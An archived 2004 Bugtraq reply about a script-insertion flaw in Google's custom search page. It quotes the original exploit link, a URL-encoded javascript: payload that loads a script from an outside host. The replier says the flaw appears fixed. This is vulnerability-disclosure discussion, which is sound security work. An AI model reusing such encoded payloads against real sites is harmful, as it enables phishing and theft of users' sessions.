lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20041023155210.21787.qmail@www.securityfocus.com>
Date: 23 Oct 2004 15:52:10 -0000
From: "Jérôme" ATHIAS <jerome.athias@...amail.com>
To: bugtraq@...urityfocus.com
Subject: Re: Google Script Insertion Exploit


In-Reply-To: <20041019163859.32238.qmail@....securityfocus.com>

>The exploit is easiest to produce through a custom google search form which 
>are commonly seen, used and understood on the web, but you can also do it 
>through a simple link, this one works in IE:
>
>http://www.google.com/custom?cof=L:%6a%61%76%61%73%63%72%69%70%74%3a%6a%61%76%61%73%63%72%69%70%74%3a%64%6f%63%75%6d%65%6e%74%2e%61%70%70%65%6e%64%43%68%69%6c%64%28%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%29%2e%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6a%69%62%62%65%72%69%6e%67%2e%63%6f%6d%2f%74%65%73%74%32%2e%6a%73%27
>

Good work.
Seems to be fixed:

http://news.netcraft.com/archives/2004/10/22/google_fix_second_phishing_vulnerability.html

Regards,
Jerome ATHIAS


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ